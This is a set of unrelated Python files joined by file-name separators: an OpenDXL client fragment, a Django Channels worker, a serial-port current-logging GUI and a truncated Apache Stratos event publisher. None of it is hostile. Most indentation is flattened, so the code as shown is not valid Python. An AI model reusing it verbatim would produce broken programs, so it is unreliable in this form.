logger.error("Error during connect: %s", latest_ex.message)
if latest_ex_traceback:
logger.debug(latest_ex_traceback)
logger.debug("Launching event loop...")
self._client.loop_start()
return DXL_ERR_SUCCESS
@property
def current_broker(self):
"""
The :class:`dxlclient.broker.Broker` that the client is currently connected to. ``None`` is returned
if the client is not currently connected to a :class:`dxlclient.broker.Broker`.
"""
with self._current_broker_lock:
if self.connected:
return self._current_broker
else:
return None
def _set_current_broker(self, current_broker):
"""
Internal method. Sets the current broker.
:param current_broker: {@code dxlclient.broker.Broker} to set as current broker.
"""
with self._current_broker_lock:
self._current_broker = current_broker
def _reset_current_broker(self):
"""
Clean current broker.
"""
with self._current_broker_lock:
self._current_broker = None
def subscribe(self, topic):
"""
Subscribes to the specified topic on the DXL fabric. This method is typically used in
conjunction with the registration of :class:`dxlclient.callbacks.EventCallback` instances
via the :func:`add_event_callback` method.
The following is a simple example of using this:
.. code-block:: python
from dxlclient.callbacks import EventCallback
class MyEventCallback(EventCallback):
def on_event(self, event):
print "Received event! " + event.source_client_id
dxl_client.add_event_callback("/testeventtopic", MyEventCallback(), False)
dxl_client.subscribe("/testeventtopic")
**NOTE:** By default when registering an event callback the client will automatically subscribe to the topic.
In this example the :func:`dxlclient.client.DxlClient.add_event_callback` method is invoked with the
``subscribe_to_topic`` parameter set to ``False`` preventing the automatic subscription.
:param topic: The topic to subscribe to
"""
logger.debug("%s(): Waiting for Subscriptions lock...", DxlUtils.func_name())
self._subscriptions_lock.acquire()
try:
if topic not in self._subscriptions:
self._subscriptions.add(topic)
if self.connected:
self._client.subscribe(topic)
finally:
logger.debug("%s(): Releasing Subscriptions lock.", DxlUtils.func_name())
self._subscriptions_lock.release()
def unsubscribe(self, topic):
"""
Unsubscribes from the specified topic on the DXL fabric.
See the :func:`subscribe` method for more information on subscriptions.
:param topic: The topic to unsubscribe from
"""
logger.debug("%s(): Waiting for Subscriptions lock...", DxlUtils.func_name())
self._subscriptions_lock.acquire()
try:
if topic in self._subscriptions:
if self.connected:
self._client.unsubscribe(topic)
finally:
self._subscriptions.remove(topic)
logger.debug("%s(): Releasing Subscriptions lock.", DxlUtils.func_name())
self._subscriptions_lock.release()
@property
def subscriptions(self):
"""
A tuple containing the topics that the client is currently subscribed to
See :func:`subscribe` for more information on adding subscriptions
"""
logger.debug("%s(): Waiting for Subscriptions lock...", DxlUtils.func_name())
self._subscriptions_lock.acquire()
try:
return tuple(self._subscriptions)
finally:
logger.debug("%s(): Releasing Subscriptions lock.", DxlUtils.func_name())
self._subscriptions_lock.release()
def sync_request(self, request, timeout=_DEFAULT_WAIT):
"""
Sends a :class:`dxlclient.message.Request` message to a remote DXL service.
See module :mod:`dxlclient.service` for more information on DXL services.
:param request: The :class:`dxlclient.message.Request` message to send to a remote DXL service
:param timeout: The amount of time (in seconds) to wait for the :class:`dxlclient.message.Response`
to the request. If the timeout is exceeded an exception will be raised. Defaults to ``3600``
seconds (1 hour)
"""
if threading.currentThread().name.startswith(self._message_pool_prefix):
raise DxlException("Synchronous requests may not be invoked while handling an incoming message. " +
"The synchronous request must be made on a different thread.")
return self._request_manager.sync_request(request, timeout)
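# Illustrative sketch (not part of the original source): how sync_request() is typically
# used, assuming `client` is a connected DxlClient and "/sample/service/topic" is a
# hypothetical topic that some registered service listens on.
def _example_sync_request(client):
    from dxlclient.message import Message, Request
    req = Request("/sample/service/topic")
    req.payload = "ping".encode()
    res = client.sync_request(req, timeout=5)
    if res.message_type == Message.MESSAGE_TYPE_ERROR:
        raise Exception("Service returned an error response")
    return res.payload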
def async_request(self, request, response_callback=None):
"""
Sends a :class:`dxlclient.message.Request` message to a remote DXL service asynchronously.
This method differs from :func:`sync_request` due to the fact that it returns to the caller
immediately after delivering the :class:`dxlclient.message.Request` message to the DXL fabric (It does
not wait for the corresponding :class:`dxlclient.message.Response` to be received).
An optional :class:`dxlclient.callbacks.ResponseCallback` can be specified. This callback will be invoked
when the corresponding :class:`dxlclient.message.Response` message is received by the client.
See module :mod:`dxlclient.service` for more information on DXL services.
:param request: The :class:`dxlclient.message.Request` message to send to a remote DXL service
:param response_callback: An optional :class:`dxlclient.callbacks.ResponseCallback` that will be invoked
when the corresponding :class:`dxlclient.message.Response` message is received by the client.
"""
return self._request_manager.async_request(request, response_callback)
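# Illustrative sketch (not part of the original source): the asynchronous counterpart of
# the example above, assuming `client` is a connected DxlClient. The callback is invoked
# on one of the client's incoming-message threads when the Response arrives.
def _example_async_request(client):
    from dxlclient.callbacks import ResponseCallback
    from dxlclient.message import Request

    class PrintingResponseCallback(ResponseCallback):
        def on_response(self, response):
            print(response.payload)

    req = Request("/sample/service/topic")  # hypothetical topic
    req.payload = "ping".encode()
    client.async_request(req, PrintingResponseCallback())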
def _get_async_callback_count(self):
"""
Returns the count of async callbacks that are waiting for a response
:return: The count of async callbacks that are waiting for a response
"""
return self._request_manager._get_async_callback_count()
def _publish_message(self, channel, payload, qos):
"""
Publishes the specified message
:param channel: The channel to publish on
:param payload: The message content
:param qos: The quality of service (QOS)
"""
self._client.publish(topic=channel, payload=payload, qos=qos)
def _send_request(self, request):
"""
Sends the specified request to the DXL fabric.
:param request: The request to send to the DXL fabric
"""
if request is None or not isinstance(request, Request):
raise ValueError("Invalid or unspecified request object")
request.reply_to_topic = self._reply_to_topic
self._publish_message(request.destination_topic, request._to_bytes(), self._qos)
def send_response(self, response):
"""
Attempts to deliver the specified :class:`dxlclient.message.Response` message to the DXL fabric.
The fabric will in turn attempt to deliver the response back to the client who sent the
corresponding :class:`dxlclient.message.Request`.
See module :mod:`dxlclient.message` for more information on message types, how they are delivered to
remote clients, etc.
See module :mod:`dxlclient.service` for more information on DXL services.
        :param response: The :class:`dxlclient.message.Response` to send
"""
if response is None or not isinstance(response, Response):
raise ValueError("Invalid or unspecified response object")
self._publish_message(response.destination_topic, response._to_bytes(), self._qos)
def send_event(self, event):
"""
Attempts to deliver the specified :class:`dxlclient.message.Event` message to the DXL fabric.
See module :mod:`dxlclient.message` for more information on message types, how they are delivered to
remote clients, etc.
:param event: The :class:`dxlclient.message.Event` to send
"""
if event is None or not isinstance(event, Event):
raise ValueError("Invalid or unspecified event object")
self._publish_message(event.destination_topic, event._to_bytes(), self._qos)
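# Illustrative sketch (not part of the original source): publishing an Event via
# send_event(), assuming `client` is a connected DxlClient; the topic is hypothetical
# and any subscribed clients with an EventCallback on it will receive the message.
def _example_send_event(client):
    from dxlclient.message import Event
    evt = Event("/sample/event/topic")
    evt.payload = "hello".encode()
    client.send_event(evt)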
def add_request_callback(self, topic, request_callback):
"""
Adds a :class:`dxlclient.callbacks.RequestCallback` to the client for the specified topic.
The callback will be invoked when :class:`dxlclient.message.Request` messages are received by the client
on the specified topic. A topic of ``None`` indicates that the callback should receive
:class:`dxlclient.message.Request` messages for all topics (no filtering).
**NOTE:** Usage of this method is quite rare due to the fact that registration of
:class:`dxlclient.callbacks.RequestCallback` instances with the client occurs automatically when
registering a service. See module :mod:`dxlclient.service` for more information on DXL services.
:param topic: The topic to receive :class:`dxlclient.message.Request` messages on. A topic of ``None`` indicates
that the callback should receive :class:`dxlclient.message.Request` messages for all topics (no filtering).
:param request_callback: The :class:`dxlclient.callbacks.RequestCallback` to be invoked when a
:class:`dxlclient.message.Request` message is received on the specified topic
"""
self._request_callbacks.add_callback(("" if topic is None else topic), request_callback)
def remove_request_callback(self, topic, request_callback):
"""
Removes a :class:`dxlclient.callbacks.RequestCallback` from the client for the specified topic. This method
must be invoked with the same arguments as when the callback was originally registered via
:func:`add_request_callback`.
:param topic: The topic to remove the callback for
:param request_callback: The :class:`dxlclient.callbacks.RequestCallback` to be removed for the specified topic
"""
self._request_callbacks.remove_callback(("" if topic is None else topic), request_callback)
def add_response_callback(self, topic, response_callback):
"""
Adds a :class:`dxlclient.callbacks.ResponseCallback` to the client for the specified topic.
The callback will be invoked when :class:`dxlclient.message.Response` messages are received by the client
on the specified topic. A topic of ``None`` indicates that the callback should receive
:class:`dxlclient.message.Response` messages for all topics (no filtering).
        **NOTE:** Usage of this method is quite rare because the use of
        :class:`dxlclient.callbacks.ResponseCallback` instances is typically limited to invoking a
        remote DXL service via the :func:`async_request` method.
        :param topic: The topic to receive :class:`dxlclient.message.Response` messages on. A topic of ``None`` indicates
            that the callback should receive :class:`dxlclient.message.Response` messages for all topics (no filtering).
        :param response_callback: The :class:`dxlclient.callbacks.ResponseCallback` to be invoked when a
            :class:`dxlclient.message.Response` message is received on the specified topic
"""
self._response_callbacks.add_callback(("" if topic is None else topic), response_callback)
def remove_response_callback(self, topic, response_callback):
"""
Removes a :class:`dxlclient.callbacks.ResponseCallback` from the client for the specified topic. This method
must be invoked with the same arguments as when the callback was originally registered via
:func:`add_response_callback`.
:param topic: The topic to remove the callback for
:param response_callback: The :class:`dxlclient.callbacks.ResponseCallback` to be removed for the specified topic
"""
self._response_callbacks.remove_callback(("" if topic is None else topic), response_callback)
def add_event_callback(self, topic, event_callback, subscribe_to_topic=True):
"""
Adds a :class:`dxlclient.callbacks.EventCallback` to the client for the specified topic.
The callback will be invoked when :class:`dxlclient.message.Event` messages are received by the client
on the specified topic. A topic of ``None`` indicates that the callback should receive
:class:`dxlclient.message.Event` messages for all topics (no filtering).
:param topic: The topic to receive :class:`dxlclient.message.Event` messages on. A topic of ``None`` indicates
that the callback should receive :class:`dxlclient.message.Event` messages for all topics (no filtering).
:param event_callback: The :class:`dxlclient.callbacks.EventCallback` to be invoked when a
:class:`dxlclient.message.Event` message is received on the specified topic
:param subscribe_to_topic: Optional parameter to indicate if the client should subscribe
(:func:`dxlclient.client.DxlClient.subscribe`) to the topic.
By default the client will subscribe to the topic. Specify ``False`` to prevent subscribing to the topic.
"""
self._event_callbacks.add_callback(("" if topic is None else topic), event_callback)
if subscribe_to_topic is True and topic is not None:
self.subscribe(topic)
def remove_event_callback(self, topic, event_callback, unsubscribe_from_topic=True):
"""
Removes a :class:`dxlclient.callbacks.EventCallback` from the client for the specified topic. This method
must be invoked with the same arguments as when the callback was originally registered via
:func:`add_event_callback`.
:param topic: The topic to remove the callback for
:param event_callback: The :class:`dxlclient.callbacks.EventCallback` to be removed for the specified topic
:param unsubscribe_from_topic: Optional parameter to indicate if the client should also unsubscribe
(:func:`dxlclient.client.DxlClient.unsubscribe`) from the topic. By default the client will unsubscribe
            from the topic. Specify ``False`` to prevent unsubscribing from the topic.
"""
self._event_callbacks.remove_callback(("" if topic is None else topic), event_callback)
if unsubscribe_from_topic is True and topic is not None:
self.unsubscribe(topic)
def _fire_request(self, request):
"""
Fires the specified {@link Request} to {@link RequestCallback} listeners currently
registered with the client.
:param request: The {@link Request} to fire
"""
self._request_callbacks.fire_message(request)
def _fire_response(self, response):
"""
Fires the specified {@link Response} to {@link ResponseCallback} listeners currently
registered with the client.
:param response: The {@link Response} to fire
"""
self._response_callbacks.fire_message(response)
def _fire_event(self, event):
"""
Fires the specified {@link Event} to {@link EventCallback} listeners currently
registered with the client.
:param event: The {@link Event} to fire
"""
self._event_callbacks.fire_message(event)
def _handle_message(self, channel, payload):
"""
Processes an incoming message. The bytes from the message are converted into the appropriate
message type instance (request, response, event, etc.) and then the corresponding registered
message callbacks are notified.
:param channel: The channel that the message arrived on
:param payload: The message received from the channel (as bytes)
"""
message = Message._from_bytes(payload)
message.destination_topic = channel
if isinstance(message, Event):
self._fire_event(message)
elif isinstance(message, Request):
self._fire_request(message)
elif isinstance(message, Response) or isinstance(message, ErrorResponse):
self._fire_response(message)
else:
raise ValueError("Unknown message type")
def register_service_async(self, service_reg_info):
"""
Registers a DXL service with the fabric asynchronously. The specified
:class:`dxlclient.service.ServiceRegistrationInfo` instance contains information about the
service that is to be registered.
This method differs from :func:`register_service_sync` due to the fact that it returns to the caller
immediately after sending the registration message to the DXL fabric (It does
not wait for registration confirmation before returning).
See :mod:`dxlclient.service` for more information on DXL services.
:param service_reg_info: A :class:`dxlclient.service.ServiceRegistrationInfo` instance containing information
about the service that is to be registered.
"""
        if self._service_manager:
            self._service_manager.add_service(service_reg_info)
def unregister_service_async(self, service_reg_info):
"""
Unregisters (removes) a DXL service with from the fabric asynchronously. The specified
:class:`dxlclient.service.ServiceRegistrationInfo` instance contains information about the
service that is to be removed.
This method differs from :func:`unregister_service_sync` due to the fact that it returns to the caller
immediately after sending the unregistration message to the DXL fabric (It does
not wait for unregistration confirmation before returning).
See :mod:`dxlclient.service` for more information on DXL services.
:param service_reg_info: A :class:`dxlclient.service.ServiceRegistrationInfo` instance containing information
about the service that is to be unregistered.
"""
        if self._service_manager:
            self._service_manager.remove_service(service_reg_info.service_id)
def register_service_sync(self, service_req_info, timeout):
"""
Registers a DXL service with the fabric. The specified
:class:`dxlclient.service.ServiceRegistrationInfo` instance contains information about the
service that is to be registered.
This method will wait for confirmation of the service registration for up to the specified timeout
in seconds. If the timeout is exceeded an exception will be raised.
See :mod:`dxlclient.service` for more information on DXL services.
        :param service_req_info: A :class:`dxlclient.service.ServiceRegistrationInfo` instance containing information
about the service that is to be registered.
:param timeout: The amount of time (in seconds) to wait for confirmation of the service registration.
If the timeout is exceeded an exception will be raised.
"""
if self._service_manager:
if not self.connected:
raise DxlException("Client is not currently connected")
self._service_manager.add_service(service_req_info)
service_req_info._wait_for_registration(timeout=timeout)
def unregister_service_sync(self, service_req_info, timeout):
"""
Unregisters (removes) a DXL service from the fabric. The specified
:class:`dxlclient.service.ServiceRegistrationInfo` instance contains information about the
service that is to be removed.
This method will wait for confirmation of the service unregistration for up to the specified timeout
in seconds. If the timeout is exceeded an exception will be raised.
See :mod:`dxlclient.service` for more information on DXL services.
        :param service_req_info: A :class:`dxlclient.service.ServiceRegistrationInfo` instance containing information
about the service that is to be removed.
:param timeout: The amount of time (in seconds) to wait for confirmation of the service unregistration.
If the timeout is exceeded an exception will be raised.
"""
if self._service_manager:
if not self.connected:
raise DxlException("Client is not currently connected")
if not service_req_info:
raise ValueError("Undefined service object")
self._service_manager.remove_service(service_req_info.service_id)
service_req_info._wait_for_unregistration(timeout=timeout)
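# Illustrative sketch (not part of the original source): registering (and later removing)
# a simple echo service with register_service_sync()/unregister_service_sync(), assuming
# `client` is a connected DxlClient; the service type and topic names are made up.
def _example_register_echo_service(client):
    from dxlclient.callbacks import RequestCallback
    from dxlclient.message import Response
    from dxlclient.service import ServiceRegistrationInfo

    class EchoRequestCallback(RequestCallback):
        def on_request(self, request):
            # Echo the request payload back to the caller
            res = Response(request)
            res.payload = request.payload
            client.send_response(res)

    info = ServiceRegistrationInfo(client, "/sample/echo/service")
    info.add_topic("/sample/echo/service/echo", EchoRequestCallback())
    client.register_service_sync(info, timeout=10)
    return info  # keep a reference; pass it to unregister_service_sync() when done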
|
worker.py
|
from __future__ import unicode_literals
import fnmatch
import logging
import multiprocessing
import signal
import sys
import threading
import time
from .exceptions import ChannelSocketException, ConsumeLater, DenyConnection
from .message import Message
from .signals import consumer_finished, consumer_started, worker_ready
from .utils import name_that_thing
logger = logging.getLogger('django.channels')
class Worker(object):
"""
A "worker" process that continually looks for available messages to run
and runs their consumers.
"""
def __init__(
self,
channel_layer,
callback=None,
message_retries=10,
signal_handlers=True,
only_channels=None,
exclude_channels=None
):
self.channel_layer = channel_layer
self.callback = callback
self.message_retries = message_retries
self.signal_handlers = signal_handlers
self.only_channels = only_channels
self.exclude_channels = exclude_channels
self.termed = False
self.in_job = False
def install_signal_handler(self):
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGINT, self.sigterm_handler)
def sigterm_handler(self, signo, stack_frame):
self.termed = True
if self.in_job:
logger.info("Shutdown signal received while busy, waiting for loop termination")
else:
logger.info("Shutdown signal received while idle, terminating immediately")
sys.exit(0)
def apply_channel_filters(self, channels):
"""
Applies our include and exclude filters to the channel list and returns it
"""
if self.only_channels:
channels = [
channel for channel in channels
if any(fnmatch.fnmatchcase(channel, pattern) for pattern in self.only_channels)
]
if self.exclude_channels:
channels = [
channel for channel in channels
if not any(fnmatch.fnmatchcase(channel, pattern) for pattern in self.exclude_channels)
]
return channels
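# Illustrative sketch (not part of the original source): how the include/exclude globs
# used by apply_channel_filters() behave, exercised with fnmatch on made-up channel names.
def _channel_filter_example():
    channels = ["http.request", "websocket.connect", "websocket.receive"]
    only = ["websocket.*"]
    exclude = ["*.receive"]
    kept = [c for c in channels
            if any(fnmatch.fnmatchcase(c, p) for p in only)]
    kept = [c for c in kept
            if not any(fnmatch.fnmatchcase(c, p) for p in exclude)]
    return kept  # -> ["websocket.connect"]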
def ready(self):
"""
Called once worker setup is complete.
"""
worker_ready.send(sender=self)
def run(self):
"""
Tries to continually dispatch messages to consumers.
"""
if self.signal_handlers:
self.install_signal_handler()
channels = self.apply_channel_filters(self.channel_layer.router.channels)
logger.info("Listening on channels %s", ", ".join(sorted(channels)))
while not self.termed:
self.in_job = False
channel, content = self.channel_layer.receive_many(channels, block=True)
self.in_job = True
# If no message, stall a little to avoid busy-looping then continue
if channel is None:
time.sleep(0.01)
continue
# Create message wrapper
logger.debug("Got message on %s (reply %s)", channel, content.get("reply_channel", "none"))
message = Message(
content=content,
channel_name=channel,
channel_layer=self.channel_layer,
)
# Add attribute to message if it's been retried almost too many times,
# and would be thrown away this time if it's requeued. Used for helpful
# warnings in decorators and such - don't rely on this as public API.
if content.get("__retries__", 0) == self.message_retries:
message.__doomed__ = True
# Handle the message
match = self.channel_layer.router.match(message)
if match is None:
logger.error("Could not find match for message on %s! Check your routing.", channel)
continue
else:
consumer, kwargs = match
if self.callback:
self.callback(channel, message)
try:
logger.debug("Dispatching message on %s to %s", channel, name_that_thing(consumer))
# Send consumer started to manage lifecycle stuff
consumer_started.send(sender=self.__class__, environ={})
# Run consumer
consumer(message, **kwargs)
except DenyConnection:
# They want to deny a WebSocket connection.
if message.channel.name != "websocket.connect":
raise ValueError("You cannot DenyConnection from a non-websocket.connect handler.")
message.reply_channel.send({"close": True})
except ChannelSocketException as e:
e.run(message)
except ConsumeLater:
# They want to not handle it yet. Re-inject it with a number-of-tries marker.
content['__retries__'] = content.get("__retries__", 0) + 1
# If we retried too many times, quit and error rather than
# spinning forever
if content['__retries__'] > self.message_retries:
logger.warning(
"Exceeded number of retries for message on channel %s: %s",
channel,
repr(content)[:100],
)
continue
# Try to re-insert it a few times then drop it
for _ in range(10):
try:
self.channel_layer.send(channel, content)
except self.channel_layer.ChannelFull:
time.sleep(0.05)
else:
break
except:
logger.exception("Error processing message with consumer %s:", name_that_thing(consumer))
finally:
# Send consumer finished so DB conns close etc.
consumer_finished.send(sender=self.__class__)
class WorkerGroup(Worker):
"""
Group several workers together in threads. Manages the sub-workers,
terminating them if a signal is received.
"""
def __init__(self, *args, **kwargs):
n_threads = kwargs.pop('n_threads', multiprocessing.cpu_count()) - 1
super(WorkerGroup, self).__init__(*args, **kwargs)
kwargs['signal_handlers'] = False
self.workers = [Worker(*args, **kwargs) for ii in range(n_threads)]
def sigterm_handler(self, signo, stack_frame):
self.termed = True
for wkr in self.workers:
wkr.termed = True
logger.info("Shutdown signal received while busy, waiting for "
"loop termination")
def ready(self):
super(WorkerGroup, self).ready()
for wkr in self.workers:
wkr.ready()
def run(self):
"""
Launch sub-workers before running.
"""
self.threads = [threading.Thread(target=self.workers[ii].run)
for ii in range(len(self.workers))]
for t in self.threads:
t.start()
super(WorkerGroup, self).run()
# Join threads once completed.
for t in self.threads:
t.join()
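# Illustrative sketch (not part of the original source): driving a WorkerGroup, assuming
# `channel_layer` is the same channel-layer wrapper object the classes above expect
# (it must expose .router, .receive_many, .send and .ChannelFull).
def _run_worker_group(channel_layer, threads=4):
    # n_threads counts the calling thread plus the sub-workers, so threads=4
    # starts three extra Worker threads alongside the group itself.
    group = WorkerGroup(channel_layer, n_threads=threads)
    group.ready()  # emits worker_ready for the group and each sub-worker
    group.run()    # blocks until SIGTERM/SIGINT sets `termed` on all workers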
|
code.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 1/8/2020 3:41 PM
# @Author : yonnsongLee@163.com
# @Site :
# @File : app.py
# @Software: PyCharm
import array
import sys
import time
import serial
import serial.tools.list_ports
import threading
import pyqtgraph as pg
from tkinter import *
from openpyxl import *
serialPortList = []
for item in serial.tools.list_ports.comports():
serialPortList.append(str(item)[0:str(item).find("-")-1])
def controlPanel():
global buttonList, btnStart, btnPause, btnStop, allSampleNumberEntry, rangeFromEntry, rangeToEntry, resultAverageCurrentEntry
root = Tk()
root.title(" CONTROL PANEL")
# root.iconbitmap('m.ico')
ws = root.winfo_screenwidth()
hs = root.winfo_screenheight()
x = (ws / 2) - (800 / 2)
y = (hs / 2) - (500 / 2)
root.geometry('%dx%d+%d+%d' % (800, 500, x, y))
labelTop = Label(root,text="1. Select the serial port",font=("Calibri",13))
labelTop.place(x = 20,y = 10,anchor = NW)
buttonList = StringVar()
for index,port in enumerate(serialPortList):
r = Radiobutton(root, variable=buttonList, value=port, text=port, bd=10, font=("Calibri",10))
r.place(x=100*index+50, y=50)
    if(len(serialPortList) > 0):
        buttonList.set(serialPortList[0])
labelButton = Label(root, text="2. Start acquisition",font=("Calibri",13))
labelButton.place(x = 20,y = 100,anchor = NW)
btnStart = Button(root, text=" START", bg="SeaGreen", fg="white",width=10, command=startAcquisition)
btnPause = Button(root, text=" PAUSE", bg="Olive", fg="white", width=10, command=pauseAcquisition)
btnStop = Button(root, text=" STOP ", bg="red", fg="white", width=10, command=stopAcquisition)
btnStart.place(x=60, y=150)
labelSampleNumberTitle = Label(root, text="3. Get the number of samples",font=("Calibri",13))
labelSampleNumberTitle.place(x = 20, y = 200, anchor = NW)
allSampleNumberLabel = Label(root,text="Sample Num:",font=("Calibri",10))
allSampleNumberEntry = Entry(root,width=10,justify=CENTER)
btnGetSampleNumber = Button(root, text="Get", bg="OrangeRed", fg="white", width=6,command=getSampleNumber)
allSampleNumberLabel.place(x = 60, y = 250)
allSampleNumberEntry.place(x = 175,y = 250)
btnGetSampleNumber.place(x = 290, y = 245)
labelAverageCurrentTitle = Label(root, text="4. Calculate the average current, view waveform and input the range to calculate",font=("Calibri",13))
labelAverageCurrentTitle.place(x = 20, y = 300, anchor = NW)
rangeFromLabel = Label(root,text="From",font=("Calibri",10))
rangeFromEntry = Entry(root,width=10,justify=CENTER)
rangeToLabel = Label(root,text="To",font=("Calibri",10))
rangeToEntry = Entry(root,width=10,justify=CENTER)
resultAverageCurrentLabel = Label(root,text="Average Value is :",font=("Calibri",10))
resultAverageCurrentEntry = Entry(root,width=19,bd=3,fg="MediumBlue",justify=CENTER)
btnAverageCurrent = Button(root, text="Average Value", bg="orange", fg="white",width=15, command=calculateAverageCurrent)
rangeFromLabel.place(x = 60,y = 350)
rangeFromEntry.place(x = 110,y = 350)
rangeToLabel.place(x = 230,y = 350)
rangeToEntry.place(x = 280,y = 350)
# resultAverageCurrentLabel.place(x = 400, y = 350)
resultAverageCurrentEntry.place(x = 570, y = 350)
btnAverageCurrent.place(x = 400, y = 346)
labelAverageCurrentTitle = Label(root,text="5. Save data to Excel file",font=("Calibri", 13))
labelAverageCurrentTitle.place(x=20, y=410, anchor=NW)
btnIntoExcel = Button(root, text="To Excel", bg="Tomato", fg="white",width=15, command=saveDataIntoExcel)
btnIntoExcel.place(x = 300, y = 410)
else:
labelWarningNoSerialPortConnection = Label(root, text=" No serial port available, please connect.. ",fg="red",font=("Calibri", 20))
labelWarningNoSerialPortConnection.place(x=100, y=300)
root.mainloop()
def startAcquisition():
global buttonList, mSerial, btnStart, btnStop,root
portx = buttonList.get()
mSerial = serial.Serial(portx, baudrate=115200, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE, timeout=None)
if (mSerial.isOpen()):
mSerial.flushInput()
btnStart.place_forget()
btnStop.place(x=300, y=150)
th1 = threading.Thread(target=Serial) # watch and read the serialPort data
th1.setDaemon(True)
th1.start()
else:
print("open failed")
mSerial.close() # close serial port
def pauseAcquisition():
global buttonList, mSerial, btnStart, btnStop, btnPause, pausing
    if (mSerial.isOpen()):
mSerial.close()
btnPause.place_forget()
btnStop.place_forget()
btnStart.place(x=60, y=150)
pausing = False
def stopAcquisition():
global buttonList, mSerial, btnStart, btnPause, btnStop
    if(mSerial.isOpen()):
mSerial.close()
btnPause.place_forget()
btnStop.place_forget()
btnStart.place(x=60, y=150)
# allData.clear()
def setRangeFrom():
print("from...")
def setRangeTo():
print("to..")
def getSampleNumber():
global allSampleNumberEntry
allSampleNumberEntry.delete(0,'end')
allSampleNumberEntry.insert(0,len(allData))
def calculateAverageCurrent():
global rangeFromEntry, rangeToEntry, resultAverageCurrentEntry
resultAverageCurrentEntry.delete(0,'end')
try:
From = int(rangeFromEntry.get())
To = int(rangeToEntry.get())
except Exception:
resultAverageCurrentEntry.insert(0, 'input should be integer')
else:
From = From -1
To = To - 1
count = 0
if(len(allData) <= 0):
resultAverageCurrentEntry.insert(0, "No sample data")
else:
if (From < 0 or To < 0 or To < From or To>=len(allData)):
resultAverageCurrentEntry.insert(0, "input valid")
else:
sampleNum = To - From + 1
while(From <= To):
count += allData[From]
From += 1
average_val = count / sampleNum
resultAverageCurrentEntry.insert(0,average_val)
def saveDataIntoExcel():
wb_name = str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())).replace(':','_') + '.xlsx'
wb = Workbook()
ws = wb.active
ws.title = 'current_data'
ws.cell(1,1,'Current:A')
for i in range(len(allData)):
ws.cell(i+2,1,allData[i])
wb.save(wb_name)
def Serial():
global mSerial
while(True):
_data = str(mSerial.readline())
# _data = str(_data)[2:-5]
# _data1 = str(_data).replace('\\n','')
_data = _data.lstrip("b").strip("'").rstrip("\\r\\n")
# print(_data)
if(_data == ""):
continue
else:
global i,startTime
try:
_data = float(_data)
except Exception:
print("Not float data")
else:
now = pg.ptime.time()
i = i + 1
if(i> 50000 or pausing):
break
_data = float(_data)
# print(i,_data)
if i==1:
startTime = float(pg.ptime.time())
timeList.append(0)
allData.append(_data)
else:
timeList.append(float(now)-startTime)
allData.append(_data)
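# Illustrative sketch (not part of the original source): what the clean-up chain in
# Serial() does to a typical readline() result under Python 3, where str(bytes)
# yields the repr of the bytes object.
def _parse_example():
    raw = str(b'123.45\r\n')                           # "b'123.45\\r\\n'"
    clean = raw.lstrip("b").strip("'").rstrip("\\r\\n")
    return float(clean)                                # 123.45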
def plotData():
curve.setData(x=timeList,y=allData,pen="g")
# curve.setData(allData)
if __name__ == "__main__":
app = pg.mkQApp()
win = pg.GraphicsWindow()
win.setWindowTitle(u' real-time current curve..')
win.resize(1200, 550)
# p1 = win.addPlot(row=0, col=0)
# p1.showGrid(x=True, y=True, alpha=0.1)
# p.setRange(xRange=[0, 20000], padding=0)
# p1.setLabel(axis='left', text='Current/A')
# p1.setLabel(axis='bottom', text=' Number')
# p1.setTitle('real-time current')
# curve1 = p1.plot()
p = win.addPlot(row=0,col=0)
p.showGrid(x=True, y=True, alpha=0.1)
p.setLabel(axis='left', text='Current/A')
p.setLabel(axis='bottom', text=' Time(s)')
p.setRange(xRange=[0, 5], yRange=[-10,9000], padding=0)
p.setTitle('real-time current')
curve = p.plot()
allData = []
timeList = []
i = 0
pausing = False
th2 = threading.Thread(target = controlPanel) # loading the control panel board
th2.setDaemon(True)
th2.start()
# th1 = threading.Thread(target = Serial) # watch and read the serialPort data
# th1.setDaemon(True)
# th1.start()
timer = pg.QtCore.QTimer()
timer.timeout.connect(plotData)
timer.start(20)
app.exec_()
# th1.join()
|
publisher.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from threading import Thread
import paho.mqtt.publish as publish
import time
from Queue import Queue, Empty
import constants
import healthstats
from config import Config
from modules.event.instance.status.events import *
from modules.util import cartridgeagentutils
from modules.util.cartridgeagentutils import IncrementalCeilingListIterator
from modules.util.log import *
log = LogFactory().get_log(__name__)
publishers = {}
""" :type : dict[str, EventPublisher] """
def publish_instance_started_event():
if not Config.started:
log.info("Publishing instance started event...")
application_id = Config.application_id
service_name = Config.service_name
cluster_id = Config.cluster_id
member_id = Config.member_id
instance_id = Config.instance_id
cluster_instance_id = Config.cluster_instance_id
network_partition_id = Config.network_partition_id
partition_id = Config.partition_id
instance_started_event = InstanceStartedEvent(
application_id,
service_name,
cluster_id,
cluster_instance_id,
member_id,
instance_id,
network_partition_id,
partition_id)
publisher = get_publisher(constants.INSTANCE_STATUS_TOPIC + constants.INSTANCE_STARTED_EVENT)
publisher.publish(instance_started_event)
Config.started = True
else:
log.warn("Instance already started")
def publish_instance_activated_event():
if not Config.activated:
# Wait for all ports to be active
listen_address = Config.listen_address
configuration_ports = Config.ports
ports_active = cartridgeagentutils.wait_until_ports_active(
listen_address,
configuration_ports,
int(Config.port_check_timeout))
if ports_active:
log.info("Publishing instance activated event...")
service_name = Config.service_name
cluster_id = Config.cluster_id
member_id = Config.member_id
instance_id = Config.instance_id
cluster_instance_id = Config.cluster_instance_id
network_partition_id = Config.network_partition_id
partition_id = Config.partition_id
instance_activated_event = InstanceActivatedEvent(
service_name,
cluster_id,
cluster_instance_id,
member_id,
instance_id,
network_partition_id,
partition_id)
publisher = get_publisher(constants.INSTANCE_STATUS_TOPIC + constants.INSTANCE_ACTIVATED_EVENT)
publisher.publish(instance_activated_event)
log.info("Starting health statistics notifier")
